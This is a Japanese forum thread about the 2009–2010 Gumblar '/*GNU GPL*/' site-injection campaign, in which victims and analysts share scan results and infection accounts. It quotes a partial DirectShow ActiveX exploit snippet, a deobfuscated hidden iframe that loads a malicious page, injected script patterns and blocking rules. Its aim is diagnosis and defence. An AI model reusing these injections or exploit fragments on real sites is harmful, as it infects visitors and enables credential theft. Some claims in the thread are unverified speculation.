http://www.virustotal.com/analisis/e5de8aaec04471ffb18d9fc351f027c3aa121d9d95fb35af47570fab5ea8c849-1261872557
http://www.virustotal.com/analisis/e5de8aaec04471ffb18d9fc351f027c3aa121d9d95fb35af47570fab5ea8c849-1261903328
0079名無しさん@お腹いっぱい。
2009/12/28(月) 02:43:33たしかコレって、ゼロデイの可能性ありってやつじゃなかったか?
http://www.adobe.com/support/security/advisories/apsa09-07.html
これじゃねーだろうなぁ。
これだったら、Js切るか、AdobeReaderアンインスコしない限り、対策ないぞ。
0080名無しさん@お腹いっぱい。
2009/12/28(月) 02:48:41あんた、ちょっと遅れてる・・・・
新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
Adobe Reader 及び Acrobat の未修正の脆弱性に関する注意喚起(JPCERT/CC)
ttps://www.jpcert.or.jp/at/2009/at090027.txt
0081名無しさん@お腹いっぱい。
2009/12/28(月) 02:48:53マイクロソフトのActiveX
MS09-032あたりじゃないかな
0082名無しさん@お腹いっぱい。
2009/12/28(月) 02:53:23ありゃ。やっぱゼロデイか。PDF切っとくか。
0083名無しさん@お腹いっぱい。
2009/12/28(月) 02:57:49pdfupd.exeは>>81氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで
0084名無しさん@お腹いっぱい。
2009/12/28(月) 03:00:07Adobe Readerがインストールされていれば違った攻撃もあるかも知れない
0085名無しさん@お腹いっぱい。
2009/12/28(月) 03:12:40後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと?
0086名無しさん@お腹いっぱい。
2009/12/28(月) 03:16:040087名無しさん@お腹いっぱい。
2009/12/28(月) 03:16:17ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる
AviraフリーはWebGuardが無いから注意が必要だが
0088名無しさん@お腹いっぱい。
2009/12/28(月) 03:19:08ヒューリスティックで捕まえる場合もあるだろうし
ただ
>分かり易い症状もないってこと?
これはYesって言っといた方が対策する人も増えるか?
008987
2009/12/28(月) 03:21:34AviraはWebGuardじゃなくても検出するかも知れない
検証はしていないので分からない
0090名無しさん@お腹いっぱい。
2009/12/28(月) 03:24:39WebGuardなくてもAviraで検出することを確認
0091名無しさん@お腹いっぱい。
2009/12/28(月) 03:32:43自己レス
avast!がスクリプトに対応
/*GNU GPL*/
26日 結果: 1/41
Avast 4.8.1351.0 2009.12.27 JS:Illredir-B
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261938262
0092名無しさん@お腹いっぱい。
2009/12/28(月) 03:32:56win.jpg のvirustotalスキャン結果
ttp://www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1261938568
0093名無しさん@お腹いっぱい。
2009/12/28(月) 03:45:55avastは誤検出しまくってるようだが
そのせいではないの?
0094名無しさん@お腹いっぱい。
2009/12/28(月) 04:08:43win.jpgではなくJavaGame.jarがダウンロードされる
http://www.virustotal.com/jp/analisis/273460dd3c1cccd44da0e1f8e19e0cf506ad490f5624535cc789f65496e940f9-1261940810
009594
2009/12/28(月) 04:10:59virustotalで検出されない
0096名無しさん@お腹いっぱい。
2009/12/28(月) 05:00:58Adobe Readerも利用されるね
0097名無しさん@お腹いっぱい。
2009/12/28(月) 06:39:35avastのスレでも書かれていたけど、
このブログは大丈夫?
0098名無しさん@お腹いっぱい。
2009/12/28(月) 07:20:25JavaGame.jar はJRE(CVE-2008-5353)の脆弱性攻撃。
pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。
他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop
とかで検出されるはず(でも今は全然検出してくれなぁ)のダウンローダです。
ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。
攻撃側が用意したものを何でもインストールできちゃうわけね。
実行してみれば、その時点で落ちて来るものは分かるんだろうけど。
0099名無しさん@お腹いっぱい。
2009/12/28(月) 08:37:05fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/〜というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
再起動して、通常起動でウインドウを開始すると
マイクロソフトセキュリティーエッセンシャルが反応
詳しい表示は憶えてないけど、表示されたファイルの削除を選択(履歴見ても何も残っておらず詳しいことが不明)
↓
PCはそのまま使えていたので安心していたら、
出先で自分のサイトを携帯でみたらエラー500が表示されるのに気づく
↓
家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。
そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。
↓
もう1台のパソコンからFTPのパスワードなど変更
サーバー上のファイルも消去
ファイルを見るとindex.html index.php 〜.jsファイルがほぼすべて最下部に/*GNU GPL*/〜が埋め込まれていた。
↓
問題のPCにカスペの体験版を入れて(オンラインスキャンが停止中なので)みたら
スタートアップにsiszyd32.exeが検出されたので削除。
↓
今ここ
もうこれ再インストールするしかないんでしょうか。
0100名無しさん@お腹いっぱい。
2009/12/28(月) 08:42:16説明がわかりにくいね
自分のサイトはレンタルサーバー上にあり
FTPで更新しています。
0101名無しさん@お腹いっぱい。
2009/12/28(月) 08:47:32感染した状態でサイト更新した?
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの?
0102名無しさん@お腹いっぱい。
2009/12/28(月) 08:58:22レンタルサーバーは2つ借りていて
片方はWORDPRESSの管理画面からログインはした。
でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。
0103名無しさん@お腹いっぱい。
2009/12/28(月) 09:28:450104名無しさん@お腹いっぱい。
2009/12/28(月) 09:41:40webシールドで止まるようになった。
0105名無しさん@お腹いっぱい。
2009/12/28(月) 11:41:07いや、アンタが最初にすべきことは、自分のサイトを閉じることだろ。。
0106名無しさん@お腹いっぱい。
2009/12/28(月) 12:38:09サイトは閉めてサーバー上のファイルは全部消してるよ
今、PCの再インストール中
いらんソフトとか捨てるいいきっかけになったよ、スッキリ
0107名無しさん@お腹いっぱい。
2009/12/28(月) 14:42:08FTPクライアントは何使ってるの?
パスワード保護に強いのはないかな?
FileZilla使ってるけど全く暗号化してないしこれ最低だよな
0108名無しさん@お腹いっぱい。
2009/12/28(月) 15:10:250109名無しさん@お腹いっぱい。
2009/12/28(月) 15:38:160110名無しさん@お腹いっぱい。
2009/12/28(月) 16:35:05FFFTP使ってる
サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染
↓
感染に気付かずPC電源切り外出
↓
帰宅
電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。
あと、/*GNU GPL*/〜というコードの最後に規則的な英数字が0〜300個ずつ改行されてくっ付いてた。
一応参考までに報告
0111名無しさん@お腹いっぱい。
2009/12/28(月) 22:49:210112名無しさん@お腹いっぱい。
2009/12/28(月) 22:52:000113名無しさん@お腹いっぱい。
2009/12/28(月) 22:58:43参考になった。情報サンクス。
0114名無しさん@お腹いっぱい。
2009/12/29(火) 08:46:20適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな?
0115名無しさん@お腹いっぱい。
2009/12/29(火) 14:51:000116名無しさん@お腹いっぱい。
2009/12/29(火) 15:40:07俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは
系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ?
0117名無しさん@お腹いっぱい。
2009/12/29(火) 16:02:10出来れば最新を使うか使わない方が良い
0118116
2009/12/29(火) 18:08:06最新版への更新も検討してみるかな。
0119名無しさん@お腹いっぱい。
2009/12/29(火) 23:28:07この辺のことか?
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***
IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性(CVE-2008-0015)搭載のwin.jpgを食わせてShellCode実行!
0120名無しさん@お腹いっぱい。
2009/12/29(火) 23:40:420121名無しさん@お腹いっぱい。
2009/12/30(水) 12:04:12ttp://img51.yfrog.com/i/73429545.png/
0122名無しさん@お腹いっぱい。
2009/12/30(水) 13:24:05FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど
逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り
サイト改竄は免れんの?
それとも感染直後に(感染後FTP未使用でも)勝手にパス抜きされて接続、改竄なの?
0123名無しさん@お腹いっぱい。
2009/12/30(水) 15:22:390124名無しさん@お腹いっぱい。
2009/12/30(水) 16:30:26<script src=http://「中略」.php?op=java ></script><body>
0125名無しさん@お腹いっぱい。
2009/12/30(水) 17:47:35FFFTPに登録してあるサイトが全部がやられた
接続してないサイトもやられてたから
どれか1つ接続するとリストにある奴が全部やられたってことだな
つまりこれってFFFTPがハッキングされたことになるのか?
他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが
というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら
AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから
最初の感染はローカルってことになる
pdfとか見てたからやっぱり感染元はこれっぽいな
0126名無しさん@お腹いっぱい。
2009/12/30(水) 17:58:490127名無しさん@お腹いっぱい。
2009/12/30(水) 19:27:20うっ!ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。
0128名無しさん@お腹いっぱい。
2009/12/30(水) 20:02:06http://www12.atpages.jp/trick1/
0130名無しさん@お腹いっぱい。
2009/12/30(水) 23:59:280131名無しさん@お腹いっぱい。
2009/12/31(木) 00:57:04せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったw
ウィルスかた思ったぜw
0132名無しさん@お腹いっぱい。
2009/12/31(木) 01:49:39この脅威が去ったら電話くれ!
0133名無しさん@お腹いっぱい。
2009/12/31(木) 10:25:50感染した奴は皆このルートで判明?
ごめんなさい><文字コード指定しました
0135名無しさん@お腹いっぱい。
2009/12/31(木) 12:05:300136名無しさん@お腹いっぱい。
2009/12/31(木) 12:17:02spoolsv.exeってのが新たに出来てる気がする
これ関係ある?
0137名無しさん@お腹いっぱい。
2009/12/31(木) 12:33:10spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない?
0138名無しさん@お腹いっぱい。
2009/12/31(木) 13:24:17いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで
でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか
0139名無しさん@お腹いっぱい。
2009/12/31(木) 13:38:46ついでに、Gumblarの簡易チェックも組み込めないかな?
</head><script src=http://*.php ></script><body
これがあったら黒判定って事で。
0140名無しさん@お腹いっぱい。
2009/12/31(木) 13:41:12サービスを殺しても生きてたら
変なのが寄生してると思われ。
0141名無しさん@お腹いっぱい。
2009/12/31(木) 14:13:43Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。
0142138
2009/12/31(木) 16:06:59Process Explorer等入れてないんで(この状況下でネットつなげないし)
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない)で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか
サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか
0143名無しさん@お腹いっぱい。
2009/12/31(木) 16:19:010144名無しさん@お腹いっぱい。
2009/12/31(木) 17:24:32もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と(多分)違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ?
つうかPC調子悪いときに携帯規制とかキッツイ
0146名無しさん@お腹いっぱい。
2009/12/31(木) 18:28:550147名無しさん@お腹いっぱい。
2009/12/31(木) 20:03:18今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか
そんなのばっかりな気がするけど
/*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの?
0148名無しさん@お腹いっぱい。
2009/12/31(木) 21:21:18何人か開いちゃったんじゃないのあれ
0149名無しさん@お腹いっぱい。
2009/12/31(木) 22:37:48いまいち騒ぎになってないよな
JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない
GENOのときはPC再起動不可っていう分かりやすい(といか致命的)エラーが出たから
皆感染が分かったけど
今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが
0150名無しさん@お腹いっぱい。
2009/12/31(木) 22:45:08それでも不安が拭えない
0151名無しさん@お腹いっぱい。
2009/12/31(木) 22:51:560152名無しさん@お腹いっぱい。
2009/12/31(木) 23:10:21Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。
違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。
0153名無しさん@お腹いっぱい。
2009/12/31(木) 23:26:33MSアップデートが出来なくなった、とかそういう話も聞かないよな
今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう
コレくらいしか目立った特徴は出てない気が
0154名無しさん@お腹いっぱい。
2010/01/01(金) 03:48:56形態に電話があり、今から出勤、最悪。
Gumblar再開とかかいてあるし、何されてるのか。
正月休みもパーだな。
0155名無しさん@お腹いっぱい。
2010/01/01(金) 03:51:48ダウンロードされて、発動はしなくてもPC内に残るのかな?もしそうなら、それはそれで気持ち悪いな
0156名無しさん@お腹いっぱい。
2010/01/01(金) 04:55:50ドンマイw
0157名無しさん@お腹いっぱい。
2010/01/01(金) 04:58:13いや
0158名無しさん@お腹いっぱい。
2010/01/01(金) 05:31:17・8080
*:8080*$script,link,object
・Gumblar
*.php$script,link,object
0159名無しさん@お腹いっぱい。
2010/01/01(金) 17:36:13→ ttp://www●stardustpictures●co●jp/katagirihairi4/
0160名無しさん@お腹いっぱい。
2010/01/01(金) 17:56:020161age
2010/01/01(金) 18:02:21--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
<iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu●com/in6.php'></iframe>
--ここまで--
↓同一のコードが仕込まれてる↓
tp://rcmorningstar●com/cp/scripts/formmail-doc/example_src●html
因みに>>129のチェッカーはスルーする。
0162名無しさん@お腹いっぱい。
2010/01/01(金) 18:37:190163名無しさん@お腹いっぱい。
2010/01/01(金) 18:43:01カスぺは反応するが
0164名無しさん@お腹いっぱい。
2010/01/01(金) 19:12:5530日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな?
スレ自体は直ぐに落ちた様だけど。
avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな?
先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。
0165名無しさん@お腹いっぱい。
2010/01/01(金) 19:12:58乙です。
感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。
0166名無しさん@お腹いっぱい。
2010/01/01(金) 19:20:43>>160ニフの方も止まってるの?
0167名無しさん@お腹いっぱい。
2010/01/01(金) 19:24:09ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。
0168161
2010/01/01(金) 19:48:25高確率でヒットするので、これで捜索中・・・
0169名無しさん@お腹いっぱい。
2010/01/01(金) 19:56:23ニフの方はいけたはずだけど、中身同じじゃねえの?
0170名無しさん@お腹いっぱい。
2010/01/01(金) 21:16:49感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事?
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か
0171名無しさん@お腹いっぱい。
2010/01/01(金) 21:24:130172名無しさん@お腹いっぱい。
2010/01/01(金) 22:10:22検索してみた
悪意のあるリンク先URLのリスト(マルウェアドメイン一覧)
ttp://www.itis.tw/badlink
↑ここにリストがありますね
ホストするIP:127.0.0.1
ttp://www.itis.tw/badlink←誰が作ったの?
0173 ◆774......E
2010/01/01(金) 23:06:02反応するようにしました。
0174名無しさん@お腹いっぱい。
2010/01/02(土) 05:59:43台湾人だろ
0175名無しさん@お腹いっぱい。
2010/01/02(土) 07:38:11アウトバウンド制御してるだけでも防げそうだけどな
感染した人は入れてないだろ
0176名無しさん@お腹いっぱい。
2010/01/02(土) 08:22:58知らねえ奴は黙ってろ
0177名無しさん@お腹いっぱい。
2010/01/02(土) 09:40:25そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに
0178名無しさん@お腹いっぱい。
2010/01/02(土) 10:19:300179名無しさん@お腹いっぱい。
2010/01/02(土) 10:27:390180名無しさん@お腹いっぱい。
2010/01/02(土) 10:46:20>>172
サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
ttp://www.itis.tw/badlink
IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com
0181名無しさん@お腹いっぱい。
2010/01/02(土) 12:57:42知らねえ奴は黙ってろ
0182名無しさん@お腹いっぱい。
2010/01/02(土) 20:59:02FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる
だからGumblarはレジストリからFTPでアクセスする(改ざんする)サイトをみてるわ
FTPソフトってどれもレジストリいじってるのか?
てっきり普通のファイルに保存してるのかと思ってたぜ
0183名無しさん@お腹いっぱい。
2010/01/02(土) 22:07:17FTPは平文で、だからSFTP使えって話になってるんだよ。
0184名無しさん@お腹いっぱい。
2010/01/02(土) 22:24:42知らねえ奴は黙ってろ
0185名無しさん@お腹いっぱい。
2010/01/02(土) 22:56:18>>125の状況みるとポートだけ見てるだけではないと思うが
レジストリにFTPのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか
まあ感染してない奴が憶測で言ってもしょうがない
0186名無しさん@お腹いっぱい。
2010/01/02(土) 23:35:360187名無しさん@お腹いっぱい。
2010/01/03(日) 00:33:44放置してたんでパス変えるの忘れてたサイトみたらやらてたw
時間は2010/01/02 23:27
やっぱ感染するとFTPのIDとパス盗まれてるわ
FTP接続しなくても改ざんされてるww
0188名無しさん@お腹いっぱい。
2010/01/03(日) 00:52:23ttp://www.f-secure.com/en_EMEA/downloads/beta-programs/home-office/exploit-shield/index.html
解説サイト→ttp://all-freesoft.net/soft/vulnerability/f-secureexploitshield/f-secureexploitshield.html
XP SP3でavast!と共存させて人柱してるが、問題無く稼動中。
0189名無しさん@お腹いっぱい。
2010/01/03(日) 01:04:440190名無しさん@お腹いっぱい。
2010/01/03(日) 01:11:48サイト感染が無ければ白ってことか?
0191名無しさん@お腹いっぱい。
2010/01/03(日) 01:21:48試したところ駄目っぽい感じ
0192名無しさん@お腹いっぱい。
2010/01/03(日) 01:28:54今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ
だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも
改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな
JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ
0193名無しさん@お腹いっぱい。
2010/01/03(日) 01:30:310194名無しさん@お腹いっぱい。
2010/01/03(日) 01:33:310195名無しさん@お腹いっぱい。
2010/01/03(日) 01:39:350196188
2010/01/03(日) 01:42:57防いでくれてるのは
CVE-2006-3730
CVE-2007-0038
CVE-2006-4868
CVE-2006-4301
CVE-2008-3008
CVE-2006-0005
CVE-2008-4844
CVE-2009-0901
CVE-2009-0927
「CVE-2009-4324」入って無いじゃん・・・ (´・ω・`)
gred AVアクセラレータの方が良いかもしれん
0197名無しさん@お腹いっぱい。
2010/01/03(日) 01:46:57aviraやavastやらでも対応は出来る
ファイアウォール程度入れとけ
0198名無しさん@お腹いっぱい。
2010/01/03(日) 01:56:000199名無しさん@お腹いっぱい。
2010/01/03(日) 02:01:58実際にこの通信がパスワードを流してるかどうかは不明だけど
間違いなくおかしいと気づく
0200名無しさん@お腹いっぱい。
2010/01/03(日) 02:11:10MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな
0201名無しさん@お腹いっぱい。
2010/01/03(日) 02:26:14おまえらサイト運営してるの?
>>187以外にいる?
0202名無しさん@お腹いっぱい。
2010/01/03(日) 02:34:14Windows起動時のスタートアップに実行ファイルを登録する
その実行ファイルが通信する
その他システムの改変は今のところ俺は確認してない
しかしどんな攻撃でも可能だから注意は必要
0204名無しさん@お腹いっぱい。
2010/01/03(日) 04:34:02その通信を止めてくれてこそ役立ったってことでしょ
だいたい警告もないのにFWのログなんて見ます?
実際には大手のサイトのWEB制作会社がFWも入れてないとは
考えられないので、FWは突破されてしまっているんでしょうね
0205名無しさん@お腹いっぱい。
2010/01/03(日) 04:36:13まあ使ってるソフトにもよるがそう言うソフトを使えってこと
0206名無しさん@お腹いっぱい。
2010/01/03(日) 04:39:40知らねえ奴は黙ってろ
君にはこれが適切
0207名無しさん@お腹いっぱい。
2010/01/03(日) 04:40:09そういうのをセキュリティソフトに対する過信って言うんだよwww
0208名無しさん@お腹いっぱい。
2010/01/03(日) 04:41:26知らねえ奴は黙ってろ
0209名無しさん@お腹いっぱい。
2010/01/03(日) 04:43:19書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ
0210名無しさん@お腹いっぱい。
2010/01/03(日) 04:45:16じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ
0211名無しさん@お腹いっぱい。
2010/01/03(日) 04:47:40このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる
0212名無しさん@お腹いっぱい。
2010/01/03(日) 04:51:38だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ
0213名無しさん@お腹いっぱい。
2010/01/03(日) 04:55:180214名無しさん@お腹いっぱい。
2010/01/03(日) 05:00:05実際にはFWが役に立っているかどうかなんて分からないくせに
いい加減なこと書き込むんじゃね〜YO・・・ボケw
0215名無しさん@お腹いっぱい。
2010/01/03(日) 05:06:43全部書いてあるって言ってるのに
だから自分で試せよ
0216名無しさん@お腹いっぱい。
2010/01/03(日) 05:09:10質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない
0217名無しさん@お腹いっぱい。
2010/01/03(日) 05:56:43君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159
こんなに放置されないだろ
0218名無しさん@お腹いっぱい。
2010/01/03(日) 06:06:09だよな
はいりのとこまだ埋め込まれてるしw
あと削除してもちゃんと告知してるとこなんてわずかだろ
他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ
0219名無しさん@お腹いっぱい。
2010/01/03(日) 06:38:40Avira AntiVir Personal+Comodo Firewall
で完璧!
これ以上のセキュリティはありませんとか信じ込んでるからなwww
0220名無しさん@お腹いっぱい。
2010/01/03(日) 06:49:090221186
2010/01/03(日) 10:31:55IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。
0222名無しさん@お腹いっぱい。
2010/01/03(日) 16:38:260223名無しさん@お腹いっぱい。
2010/01/03(日) 17:54:11シス管のPCも例外ではない。
会社のシステムでトラブルの原因になるから。
そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。
ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな
0224名無しさん@お腹いっぱい。
2010/01/03(日) 18:38:480225名無しさん@お腹いっぱい。
2010/01/03(日) 18:57:52最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない
発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2 >>187
この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる
でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる
こんなところだな
0226名無しさん@お腹いっぱい。
2010/01/03(日) 19:06:360227名無しさん@お腹いっぱい。
2010/01/03(日) 19:40:420228名無しさん@お腹いっぱい。
2010/01/03(日) 19:53:24ただ言われているとおり
いつ攻撃が変わるか分からない
プログラムを実行できてしまうのでどんな攻撃も可能だから注意
0229名無しさん@お腹いっぱい。
2010/01/03(日) 21:19:510230名無しさん@お腹いっぱい。
2010/01/03(日) 21:24:200231名無しさん@お腹いっぱい。
2010/01/03(日) 21:47:44脆弱性突かれているのを防ぎきれるもんではないわな
FWもやられてしまうと考えるのが普通
0232名無しさん@お腹いっぱい。
2010/01/03(日) 22:04:450233名無しさん@お腹いっぱい。
2010/01/03(日) 22:06:220234名無しさん@お腹いっぱい。
2010/01/03(日) 22:21:11P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い
ファイルを実行しちゃう時点で駄目だけど
0235名無しさん@お腹いっぱい。
2010/01/03(日) 22:22:12これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば
ある程度防げそう。
0236名無しさん@お腹いっぱい。
2010/01/03(日) 22:23:50あくまでも今のところな
0237名無しさん@お腹いっぱい。
2010/01/03(日) 22:25:360238名無しさん@お腹いっぱい。
2010/01/03(日) 22:28:25単純だからアンチウイルスも検出しにくいって言うのもあるね
0239名無しさん@お腹いっぱい。
2010/01/03(日) 22:39:11ここの連中どんだけ呑気なんだよwww
0240名無しさん@お腹いっぱい。
2010/01/03(日) 22:49:150241名無しさん@お腹いっぱい。
2010/01/03(日) 22:51:50べつに争ってるわけじぇねえんだからやめろよ
0242名無しさん@お腹いっぱい。
2010/01/03(日) 22:59:31嘘の情報流すのはよせよ
0243名無しさん@お腹いっぱい。
2010/01/03(日) 23:00:19事前に感染を防げるかと
感染後の被害を防げるかで
話が噛み合ってない気がする
0244名無しさん@お腹いっぱい。
2010/01/03(日) 23:08:15Adobe Reader使わなきゃいいんじゃね
0245名無しさん@お腹いっぱい。
2010/01/03(日) 23:09:08話はかみ合ってないが
漏れてないと思うね
0246名無しさん@お腹いっぱい。
2010/01/03(日) 23:11:26もちろん脆弱性をふさぐのは基本だけどね
たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話
0247名無しさん@お腹いっぱい。
2010/01/03(日) 23:16:01一人勘違いしてるみたいだが
同じような人がいるかも知れないから勘違いしないようにね
0248名無しさん@お腹いっぱい。
2010/01/03(日) 23:21:380249名無しさん@お腹いっぱい。
2010/01/03(日) 23:25:32こいつはなんにも分かってない
脆弱性も分かってない
0250名無しさん@お腹いっぱい。
2010/01/03(日) 23:32:210251名無しさん@お腹いっぱい。
2010/01/03(日) 23:34:100252名無しさん@お腹いっぱい。
2010/01/03(日) 23:38:11ほとんどの人は知らないんじゃないか
0253名無しさん@お腹いっぱい。
2010/01/03(日) 23:39:39システムやファイル破壊するタイプとか出たら
FWじゃどうしようも無いからなぁ
0254名無しさん@お腹いっぱい。
2010/01/03(日) 23:39:48http://oshiete1.goo.ne.jp/qa4982913.html
0255名無しさん@お腹いっぱい。
2010/01/03(日) 23:42:36お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
0256名無しさん@お腹いっぱい。
2010/01/03(日) 23:43:07FlashPlayer更新してない人も世間的に結構居るんでね?
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう
0257名無しさん@お腹いっぱい。
2010/01/03(日) 23:45:11お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
0258名無しさん@お腹いっぱい。
2010/01/03(日) 23:45:23そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め
0259名無しさん@お腹いっぱい。
